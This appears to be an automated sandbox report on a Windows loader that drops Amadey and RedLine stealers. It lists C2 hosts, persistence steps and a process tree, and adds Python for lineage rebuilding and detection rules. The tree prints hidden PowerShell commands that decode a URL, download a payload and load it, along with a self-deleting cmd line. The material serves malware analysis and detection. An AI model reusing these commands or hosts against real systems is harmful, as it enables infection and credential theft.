Analysis
max time kernel: 141s
max time network: 166s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 05-12-2022 15:31
Static task: static1
Behavioral task: behavioral1
Sample: 880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6.exe
Resource: win10v2004-20220812-en
General
Target: 880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6.exe
Size: 332KB
MD5: 31d0310cd3d6d5e2e7c51508c12b25dd
SHA1: c19664c55ede5d5411d348fae4832823b7085086
SHA256: 880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6
SHA512: 2015f457aa5daa7ce8460c954243184ec77187f1ad1d997167074f84a3d31b32bf55be08b0d6043f20ddee289e93809150cc0b966e277fa7d66fdb92d10b1c9c
SSDEEP: 6144:2nthmabx7r/ALqcu8pPP0uJLnJ0Lf02sge2U:2ntYabx7kZdP0uJLnJWfPmd
Malware Config
Extracted
  URL: https://cdn.discordapp.com/attachments/1015613582383259758/1018992777566097538/error.log.1
  (this is the string that the base64 literal in the PowerShell stage of the process tree decodes to and fetches with Invoke-WebRequest)
Extracted
  Family: amadey
  Version: 3.50
  C2: 62.204.41.6/p9cWxH/index.php
Extracted
  Family: redline
  Botnet: Wish
  C2: 31.41.244.14:4694
  auth_value: 836b5b05c28f01127949ef1e84b93e92
Extracted
  Family: amadey
  Version: 3.10
  C2: hellomr.observer/f8dfksdj3/index.php
      researchersgokick.rocks/f8dfksdj3/index.php
      pleasetake.pictures/f8dfksdj3/index.php
Signatures
-
Detect Amadey credential stealer module 4 IoCs
Processes:
resource                                                                       yara_rule
C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll                       amadey_cred_module
behavioral1/memory/3724-154-0x0000000000A90000-0x0000000000AB4000-memory.dmp   amadey_cred_module
C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll                       amadey_cred_module
C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll                       amadey_cred_module
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Blocklisted process makes network request 3 IoCs
Processes:
flow  pid   process
41    3724  rundll32.exe
66    4356  powershell.exe
74    732   powershell.exe
Downloads MZ/PE file
-
Executes dropped EXE 9 IoCs
Processes:
pid   process
1220  gntuud.exe
228   gntuud.exe
3680  linda5.exe
1244  wish.exe
3684  build333333.exe
4548  USBtoISOConverter.exe
752   gntuud.exe
2192  Update.exe
2600  orxds.exe
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description        ioc                                                                                                   process
Key value queried  \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation  880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6.exe
Key value queried  \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation  gntuud.exe
Key value queried  \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation  linda5.exe
Key value queried  \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation  Update.exe
Loads dropped DLL 5 IoCs
Processes:
pid   process
3724  rundll32.exe
3724  rundll32.exe
2908  rundll32.exe
792   rundll32.exe
792   rundll32.exe
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 1 IoCs
Processes:
description  ioc                                                                                                                                                      process
Key opened   \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook  rundll32.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
description      ioc                                                                                                                                                                                          process
Set value (str)  \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\build333333.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000013001\\build333333.exe"              gntuud.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\USBtoISOConverter.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000019001\\USBtoISOConverter.exe"  gntuud.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\linda5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000011001\\linda5.exe"                        gntuud.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). The sandbox labels this as likely ransomware behaviour, but nothing else in this report (no mass file writes, no ransom note among the dropped files) supports that here; loaders and stealers that enumerate drives trip the same heuristic, so treat it as a weak signal on its own.
-
Program crash 3 IoCs
Processes:
pid   pid_target  process       target process
3564  4808        WerFault.exe  880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6.exe
3468  228         WerFault.exe  gntuud.exe
3892  752         WerFault.exe  gntuud.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid   process
2616  schtasks.exe
3852  schtasks.exe
Modifies registry class 1 IoCs
Processes:
description  ioc                                                                                   process
Key created  \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings  linda5.exe
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
pid   process
3724  rundll32.exe
3724  rundll32.exe
3724  rundll32.exe
3724  rundll32.exe
1244  wish.exe
4356  powershell.exe
4356  powershell.exe
1244  wish.exe
732   powershell.exe
732   powershell.exe
1268  powershell.exe
1268  powershell.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
pid   process   privileges enabled, in order
3368  wmic.exe  SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (this 21-entry sequence was recorded twice)
4576  WMIC.exe  the same 21-entry sequence, recorded once, followed by SeIncreaseQuotaPrivilege again (the list is capped at 64 IoCs)
Note: wmic.exe enables every privilege present in its token when it starts, so this signature fires for any wmic invocation regardless of who launched it. The behaviour worth keeping from this section is the set of queries build333333.exe issued through it (OS caption, video controller, CPU name), which profile the host.
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
parent pid  parent process                                                          target pid  target process          WriteProcessMemory events
4808        880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6.exe    1220        gntuud.exe              3
1220        gntuud.exe                                                              2616        schtasks.exe            3
1220        gntuud.exe                                                              3680        linda5.exe              3
3680        linda5.exe                                                              3700        control.exe             3
1220        gntuud.exe                                                              3724        rundll32.exe            3
1220        gntuud.exe                                                              1244        wish.exe                3
3700        control.exe                                                             2908        rundll32.exe            3
1220        gntuud.exe                                                              3684        build333333.exe         3
3684        build333333.exe                                                         3368        wmic.exe                3
3684        build333333.exe                                                         1272        cmd.exe                 3
1272        cmd.exe                                                                 4576        WMIC.exe                3
1220        gntuud.exe                                                              4548        USBtoISOConverter.exe   2
3684        build333333.exe                                                         4388        cmd.exe                 3
4388        cmd.exe                                                                 1508        WMIC.exe                3
2908        rundll32.exe                                                            5048        RunDll32.exe            2
5048        RunDll32.exe                                                            792         rundll32.exe            3
4548        USBtoISOConverter.exe                                                   4200        cmd.exe                 2
4200        cmd.exe                                                                 4356        powershell.exe          2
4356        powershell.exe                                                          3852        schtasks.exe            2
4548        USBtoISOConverter.exe                                                   5040        cmd.exe                 2
5040        cmd.exe                                                                 732         powershell.exe          2
4548        USBtoISOConverter.exe                                                   2032        cmd.exe                 2
2032        cmd.exe                                                                 1268        powershell.exe          2
1268        powershell.exe                                                          2192        Update.exe              3
4548        USBtoISOConverter.exe                                                   2044        cmd.exe                 1 (list capped at 64 IoCs)
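The WriteProcessMemory rows are the raw material from which the process tree further down is built, and they are the form most sandboxes export. As an added example that is not part of this report, the following Python turns a transcribed subset of the table (constructed input; the original repeats most edges two or three times, and only the distinct edges matter here) back into a parent/child tree and answers lineage questions such as how C:\ProgramData\Update.exe came to run.

```python
"""Rebuild process lineage from sandbox WriteProcessMemory rows.

Added example, not part of the original report. WPM_ROWS is a constructed
subset transcribed from the "Suspicious use of WriteProcessMemory" table
(parent pid, child pid, parent image, child image); duplicate rows are
deliberately kept to show they collapse.
"""
import re
from collections import defaultdict

WPM_ROWS = """
PID 4808 wrote to memory of 1220 4808 880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6.exe gntuud.exe
PID 4808 wrote to memory of 1220 4808 880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6.exe gntuud.exe
PID 1220 wrote to memory of 2616 1220 gntuud.exe schtasks.exe
PID 1220 wrote to memory of 3680 1220 gntuud.exe linda5.exe
PID 3680 wrote to memory of 3700 3680 linda5.exe control.exe
PID 1220 wrote to memory of 3724 1220 gntuud.exe rundll32.exe
PID 1220 wrote to memory of 1244 1220 gntuud.exe wish.exe
PID 3700 wrote to memory of 2908 3700 control.exe rundll32.exe
PID 1220 wrote to memory of 3684 1220 gntuud.exe build333333.exe
PID 3684 wrote to memory of 3368 3684 build333333.exe wmic.exe
PID 3684 wrote to memory of 1272 3684 build333333.exe cmd.exe
PID 1272 wrote to memory of 4576 1272 cmd.exe WMIC.exe
PID 1220 wrote to memory of 4548 1220 gntuud.exe USBtoISOConverter.exe
PID 2908 wrote to memory of 5048 2908 rundll32.exe RunDll32.exe
PID 5048 wrote to memory of 792 5048 RunDll32.exe rundll32.exe
PID 4548 wrote to memory of 4200 4548 USBtoISOConverter.exe cmd.exe
PID 4200 wrote to memory of 4356 4200 cmd.exe powershell.exe
PID 4356 wrote to memory of 3852 4356 powershell.exe schtasks.exe
PID 4548 wrote to memory of 2032 4548 USBtoISOConverter.exe cmd.exe
PID 2032 wrote to memory of 1268 2032 cmd.exe powershell.exe
PID 1268 wrote to memory of 2192 1268 powershell.exe Update.exe
"""

# "PID <parent> wrote to memory of <child> <parent> <parent image> <child image>";
# the backreference insists that the repeated parent pid really is repeated.
ROW_RE = re.compile(r"PID (\d+) wrote to memory of (\d+) \1 (\S+) (\S+)")


def parse_rows(text):
    """Return (parent_pid, child_pid, parent_image, child_image) per row."""
    events = []
    for line in text.strip().splitlines():
        m = ROW_RE.fullmatch(line.strip())
        if m:  # anything that is not a table row is skipped
            events.append((int(m[1]), int(m[2]), m[3], m[4]))
    return events


def build_tree(events):
    """Collapse repeated rows into parent -> {children} and pid -> image."""
    children = defaultdict(set)
    image = {}
    for ppid, pid, pimg, cimg in events:
        children[ppid].add(pid)
        image.setdefault(ppid, pimg)
        image.setdefault(pid, cimg)
    return children, image


def parent_map(children):
    return {c: p for p, kids in children.items() for c in kids}


def ancestors(pid, children):
    """Lineage of pid: immediate parent first, root last."""
    parents = parent_map(children)
    chain = []
    while pid in parents:
        pid = parents[pid]
        chain.append(pid)
    return chain


def roots(children):
    """Pids that appear as a parent but never as a child."""
    parents = parent_map(children)
    return sorted(p for p in children if p not in parents)


def render(children, image, root, depth=0):
    """Indented one-line-per-process view, children sorted by pid."""
    lines = [f"{'  ' * depth}{root} {image[root]}"]
    for kid in sorted(children.get(root, ())):
        lines.extend(render(children, image, kid, depth + 1))
    return lines


if __name__ == "__main__":
    ch, img = build_tree(parse_rows(WPM_ROWS))
    for r in roots(ch):
        print("\n".join(render(ch, img, r)))
    print("Update.exe lineage:", [img[p] for p in ancestors(2192, ch)])
```

Because the sandbox only records a WriteProcessMemory row for children the parent actually touched, processes started by the scheduler (the two root-level gntuud.exe launches later in the report) do not appear here and must be tied back to their task by command line instead.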
outlook_win_path 1 IoCs
Processes:
description  ioc                                                                                                                                                      process
Key opened   \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook  rundll32.exe
Processes
The first column is the on-disk image the sandbox observed; where a 32-bit parent passed a System32 path, WOW64 file-system redirection resolved it to SysWOW64, which is why image and command line disagree for several entries. The leading number is the sandbox's process-tree depth.

1  C:\Users\Admin\AppData\Local\Temp\880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6.exe
   cmdline: "C:\Users\Admin\AppData\Local\Temp\880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6.exe"
   - Checks computer location settings
   - Suspicious use of WriteProcessMemory
  2  C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe
     cmdline: "C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe"
     - Executes dropped EXE
     - Checks computer location settings
     - Adds Run key to start application
     - Suspicious use of WriteProcessMemory
    3  C:\Windows\SysWOW64\schtasks.exe
       cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe" /F
       - Creates scheduled task(s)
    3  C:\Users\Admin\AppData\Local\Temp\1000011001\linda5.exe
       cmdline: "C:\Users\Admin\AppData\Local\Temp\1000011001\linda5.exe"
       - Executes dropped EXE
       - Checks computer location settings
       - Modifies registry class
       - Suspicious use of WriteProcessMemory
      4  C:\Windows\SysWOW64\control.exe
         cmdline: "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\uQwK5O.CPL",
         - Suspicious use of WriteProcessMemory
        5  C:\Windows\SysWOW64\rundll32.exe
           cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\uQwK5O.CPL",
           - Loads dropped DLL
           - Suspicious use of WriteProcessMemory
          6  C:\Windows\system32\RunDll32.exe
             cmdline: C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\uQwK5O.CPL",
             - Suspicious use of WriteProcessMemory
            7  C:\Windows\SysWOW64\rundll32.exe
               cmdline: "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\uQwK5O.CPL",
               - Loads dropped DLL
    3  C:\Windows\SysWOW64\rundll32.exe
       cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
       - Blocklisted process makes network request
       - Loads dropped DLL
       - Accesses Microsoft Outlook profiles
       - Suspicious behavior: EnumeratesProcesses
       - outlook_win_path
    3  C:\Users\Admin\AppData\Local\Temp\1000012001\wish.exe
       cmdline: "C:\Users\Admin\AppData\Local\Temp\1000012001\wish.exe"
       - Executes dropped EXE
       - Suspicious behavior: EnumeratesProcesses
    3  C:\Users\Admin\AppData\Local\Temp\1000013001\build333333.exe
       cmdline: "C:\Users\Admin\AppData\Local\Temp\1000013001\build333333.exe"
       - Executes dropped EXE
       - Suspicious use of WriteProcessMemory
      4  C:\Windows\SysWOW64\Wbem\wmic.exe
         cmdline: wmic os get Caption
         - Suspicious use of AdjustPrivilegeToken
      4  C:\Windows\SysWOW64\cmd.exe
         cmdline: cmd /C "wmic path win32_VideoController get name"
         - Suspicious use of WriteProcessMemory
        5  C:\Windows\SysWOW64\Wbem\WMIC.exe
           cmdline: wmic path win32_VideoController get name
           - Suspicious use of AdjustPrivilegeToken
      4  C:\Windows\SysWOW64\cmd.exe
         cmdline: cmd /C "wmic cpu get name"
         - Suspicious use of WriteProcessMemory
        5  C:\Windows\SysWOW64\Wbem\WMIC.exe
           cmdline: wmic cpu get name
    3  C:\Users\Admin\AppData\Local\Temp\1000019001\USBtoISOConverter.exe
       cmdline: "C:\Users\Admin\AppData\Local\Temp\1000019001\USBtoISOConverter.exe"
       - Executes dropped EXE
       - Suspicious use of WriteProcessMemory
      4  C:\Windows\system32\cmd.exe
         cmdline: C:\Windows\system32\cmd.exe /c powershell -v 4 -WindowStyle hidden -executionpolicy bypass -encoded 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
         - Suspicious use of WriteProcessMemory
        5  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
           cmdline: powershell -v 4 -WindowStyle hidden -executionpolicy bypass -encoded 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
           - Blocklisted process makes network request
           - Suspicious behavior: EnumeratesProcesses
           - Suspicious use of WriteProcessMemory
          6  C:\Windows\system32\schtasks.exe
             cmdline: "C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /F /tn "Windows Scheduled Update" /rl HIGHEST /tr C:\\ProgramData\Update.exe
             - Creates scheduled task(s)
      4  C:\Windows\system32\cmd.exe
         cmdline: C:\Windows\system32\cmd.exe /c powershell -v 4 -WindowStyle hidden -executionpolicy bypass -co "[Reflection.Assembly]::Load([Convert]::FromBase64String('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')) | Out-Null; $f = 'C:\ProgramData\Update.exe';if (-not(Test-Path -Path $f -PathTy Leaf)){ try {$s = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly9jZG4uZGlzY29yZGFwcC5jb20vYXR0YWNobWVudHMvMTAxNTYxMzU4MjM4MzI1OTc1OC8xMDE4OTkyNzc3NTY2MDk3NTM4L2Vycm9yLmxvZy4x')); Invoke-WebRequest $s -Outfile 'C:\ProgramData\log';[Helper.Helper]::Library($f,'C:\ProgramData\log','HelloWorldHelloWorldHelloWorldHelloWorld','30');}catch{}}else{}
         - Suspicious use of WriteProcessMemory
        5  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
           cmdline: powershell -v 4 -WindowStyle hidden -executionpolicy bypass -co "[Reflection.Assembly]::Load([Convert]::FromBase64String('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')) | Out-Null; $f = 'C:\ProgramData\Update.exe';if (-not(Test-Path -Path $f -PathTy Leaf)){ try {$s = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly9jZG4uZGlzY29yZGFwcC5jb20vYXR0YWNobWVudHMvMTAxNTYxMzU4MjM4MzI1OTc1OC8xMDE4OTkyNzc3NTY2MDk3NTM4L2Vycm9yLmxvZy4x')); Invoke-WebRequest $s -Outfile 'C:\ProgramData\log';[Helper.Helper]::Library($f,'C:\ProgramData\log','HelloWorldHelloWorldHelloWorldHelloWorld','30');}catch{}}else{}
           - Blocklisted process makes network request
           - Suspicious behavior: EnumeratesProcesses
      4  C:\Windows\system32\cmd.exe
         cmdline: C:\Windows\system32\cmd.exe /c powershell -v 4 -WindowStyle hidden -executionpolicy bypass -encoded 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
         - Suspicious use of WriteProcessMemory
        5  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
           cmdline: powershell -v 4 -WindowStyle hidden -executionpolicy bypass -encoded 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
           - Suspicious behavior: EnumeratesProcesses
           - Suspicious use of WriteProcessMemory
          6  C:\ProgramData\Update.exe
             cmdline: "C:\ProgramData\Update.exe"
             - Executes dropped EXE
             - Checks computer location settings
            7  C:\Users\Admin\AppData\Local\Temp\b556d5b16e\orxds.exe
               cmdline: "C:\Users\Admin\AppData\Local\Temp\b556d5b16e\orxds.exe"
               - Executes dropped EXE
      4  C:\Windows\SYSTEM32\cmd.exe
         cmdline: cmd.exe /C ping 1.1.1.1 -n 1 -w 1000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\1000019001\USBtoISOConverter.exe"
        5  C:\Windows\system32\PING.EXE
           cmdline: ping 1.1.1.1 -n 1 -w 1000
           - Runs ping.exe
  2  C:\Windows\SysWOW64\WerFault.exe
     cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4808 -s 912
     - Program crash
1  C:\Windows\SysWOW64\WerFault.exe
   cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4808 -ip 4808
1  C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe
   cmdline: C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe
   - Executes dropped EXE
  2  C:\Windows\SysWOW64\WerFault.exe
     cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 228 -s 416
     - Program crash
1  C:\Windows\SysWOW64\WerFault.exe
   cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 228 -ip 228
1  C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe
   cmdline: C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe
   - Executes dropped EXE
  2  C:\Windows\SysWOW64\WerFault.exe
     cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 752 -s 416
     - Program crash
1  C:\Windows\SysWOW64\WerFault.exe
   cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 752 -ip 752

The two root-level, unquoted launches of gntuud.exe (pids 228 and 752 in the Program crash table) match the /TR of the one-minute scheduled task created above and are consistent with the task firing; both instances crashed, as did the original sample process (pid 4808).
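The command lines in this tree are the most reusable detection material on the page. As an added example, not part of the report, the Python below scores a constructed list of command lines transcribed from the tree against patterns taken from this run (a scheduled task whose action lives in a user-writable directory, a one-minute repeat, ONLOGON at the highest run level, a .cpl launched from Temp through control.exe, rundll32 loading a DLL out of AppData, hidden/bypass PowerShell, inline FromBase64String, WMI hardware queries, ping-then-del self-deletion) and decodes inline base64 to recover the URL that the Malware Config section lists. The rule names are the example's own; the two -encoded blobs are not reproduced on the page, so the -co variant stands in for them, and the last entry is a benign control.

```python
"""Score sandbox command lines against the abuse patterns seen in this run
and pull URLs out of inline base64.

Added example, not part of the original report. CMDLINES is constructed
input transcribed from the process tree; the rule set and its names are
the example's own, not the sandbox's signatures.
"""
import base64
import binascii
import re

CMDLINES = [
    r'"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe" /F',
    r'"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\uQwK5O.CPL",',
    r'"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main',
    r'cmd /C "wmic path win32_VideoController get name"',
    r'"C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /F /tn "Windows Scheduled Update" /rl HIGHEST /tr C:\\ProgramData\Update.exe',
    r"""powershell -v 4 -WindowStyle hidden -executionpolicy bypass -co "$f = 'C:\ProgramData\Update.exe'; $s = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly9jZG4uZGlzY29yZGFwcC5jb20vYXR0YWNobWVudHMvMTAxNTYxMzU4MjM4MzI1OTc1OC8xMDE4OTkyNzc3NTY2MDk3NTM4L2Vycm9yLmxvZy4x')); Invoke-WebRequest $s -Outfile 'C:\ProgramData\log'" """,
    r'cmd.exe /C ping 1.1.1.1 -n 1 -w 1000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\1000019001\USBtoISOConverter.exe"',
    r'notepad.exe C:\Users\Admin\Desktop\notes.txt',  # benign control
]

# (rule name, case-insensitive regex). Each pattern is anchored on the LOLBin
# so an argument string alone cannot trigger it.
RULES = [
    ("schtasks_target_in_user_writable_dir",
     r"schtasks.*?/tr\b.*?(?:\\AppData\\|\\ProgramData\\|\\Temp\\)"),
    ("schtasks_repeat_every_minute", r"schtasks.*?/sc\s+minute\s+/mo\s+1\b"),
    ("schtasks_onlogon_highest", r"schtasks.*?/sc\s+onlogon.*?/rl\s+highest"),
    ("control_cpl_from_temp", r"control\.exe.*?\\Temp\\.*?\.cpl"),
    ("rundll32_dll_from_appdata", r"rundll32\.exe.*?\\AppData\\.*?\.dll"),
    ("powershell_hidden_or_bypass",
     r"powershell.*?(?:-windowstyle\s+hidden|-executionpolicy\s+bypass|-enc(?:oded(?:command)?)?\b)"),
    ("powershell_inline_base64_decode", r"FromBase64String"),
    ("wmi_hardware_fingerprint", r"wmic.*?\b(?:cpu|os|win32_videocontroller)\b.*?\bget\b"),
    ("ping_delay_then_self_delete", r"ping\b.*?&\s*del\b"),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in RULES]
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


def decode_b64_strings(cmd):
    """Decode every base64 run of 24+ chars that yields printable text.

    UTF-8 is tried first, then UTF-16LE (what -EncodedCommand carries);
    UTF-8 goes first because UTF-16LE of ASCII decodes to NULs under UTF-8
    and is rejected, whereas UTF-8 text mis-read as UTF-16LE can look printable.
    """
    found = []
    for blob in B64_RE.findall(cmd):
        blob = blob.rstrip("=")
        try:
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
        except (binascii.Error, ValueError):
            continue
        for enc in ("utf-8", "utf-16-le"):
            try:
                text = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            if text.isprintable():
                found.append(text)
                break
    return found


def triage(cmd):
    """Return the rule names that fire, decoded base64 strings, and all URLs
    found either literally or inside the decoded strings."""
    hits = [name for name, rx in COMPILED if rx.search(cmd)]
    decoded = decode_b64_strings(cmd)
    urls = URL_RE.findall(cmd)
    for text in decoded:
        urls.extend(URL_RE.findall(text))
    return {"rules": hits, "decoded": decoded, "urls": urls}


if __name__ == "__main__":
    for cmd in CMDLINES:
        r = triage(cmd)
        print(f"{len(r['rules'])} hit(s) {r['rules']} urls={r['urls']}  <- {cmd[:70]}")
```

The patterns are deliberately narrow to this run; in production they would sit behind a parent-process condition (schtasks.exe spawned from a Temp-resident binary, powershell.exe spawned by cmd.exe from a user-writable path), which the lineage example earlier on the page provides.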
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
C:\ProgramData\21sg4.log
  Filesize: 10KB
  MD5: ac4358d2e39b42cfef2887b6766a63cb
  SHA1: e66f73c0af090610597ffee61c5b292a703c42ed
  SHA256: fb0bbdac464a97cbf25eca6ca8ae6aa422ba6945276bf34440b2a73b1e7118d5
  SHA512: 686afe3090cf89e29900a7520885c61093eac0489c0b2bce98dff4f09f88fae57dbfafb174ec6d42a8613f75538bf1733b9efaff7cd0b79193ca1ddc7d64536d

C:\ProgramData\Update.exe (listed twice with identical hashes)
  Filesize: 218KB
  MD5: 9512d156c84429d1854ac514ed428f22
  SHA1: 7b92f647f9606c3574b0ffb7d35a9a877ad1e18e
  SHA256: 5e19869a01fa927d8cca4183f640e6ac75d28e99e4f9084d5b3bbd8b5341cef4
  SHA512: 79a70c383eb2604d4a1cc67665f766d1e5ea45eb1e9e571c7f7fa86748037343b800bd1bb96e65dea9ee7bf50e28984cbd1be257590befd7977814ec12513855

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 3KB
  MD5: 556084f2c6d459c116a69d6fedcc4105
  SHA1: 633e89b9a1e77942d822d14de6708430a3944dbc
  SHA256: 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
  SHA512: 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: a55804de6c5e4eab0462ff4ce48aa7ec
  SHA1: a3575216f15738da14ba6f8ce927aa1d97c0b1fb
  SHA256: 3ce383be2760720f756cbe7f3dd60f891b46625de78e9f71d88e12d560743c73
  SHA512: e0d47633028118e8c1b2cb51a0727bde84eba44f031bfb868ef23fa7d48ca2fb04c9d35fbbdc498101c3156be1adbee0297fc662ffe1831a9cee002e56e2d45e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (second version of the file)
  Filesize: 1KB
  MD5: f3c942a891ec381179b84401ee770b4c
  SHA1: 8fba91a8ba93ea39fdccf1b2b3c09ea755fdb577
  SHA256: 9b871ad84265570aa0b3286115c527de9ad1fe1d37e768b12058cc95445d084c
  SHA512: 223b4b9a471142240ed7e42f88f505c4df5a451546a78cfdccafb8794ad2b184f2cf6e4d24a55fe1d8b7a075255fe230cfbec86638444d065c34f007c6218de0

C:\Users\Admin\AppData\Local\Temp\1000011001\linda5.exe (listed twice with identical hashes)
  Filesize: 1.5MB
  MD5: a951b3225db1b2e79eb76f5403ee18eb
  SHA1: cba2417769cb8172e7060e7c0e869a1a6a7ee0cc
  SHA256: b8098889539906bd82516c8d6609847832f48fea7c85e3d2d468b5c7a20daa97
  SHA512: cb4f63abe299a19be2a91876e4e50024999acf7938df1e1a53e1c88ed14b977fd132e2c4262948a44653879456ce70547bcbf152b85105eed93923079067ee4a

C:\Users\Admin\AppData\Local\Temp\1000012001\wish.exe (listed twice with identical hashes)
  Filesize: 175KB
  MD5: 8b08fce2936c8363994dda1d6e9ddadf
  SHA1: 15cfdfe6e406c0e69d2e6261b898b97eed6f34e2
  SHA256: 3f665abde637a3c65e46e96daeb9aa15c8dda5e2ed2fee15048d4fa790e66991
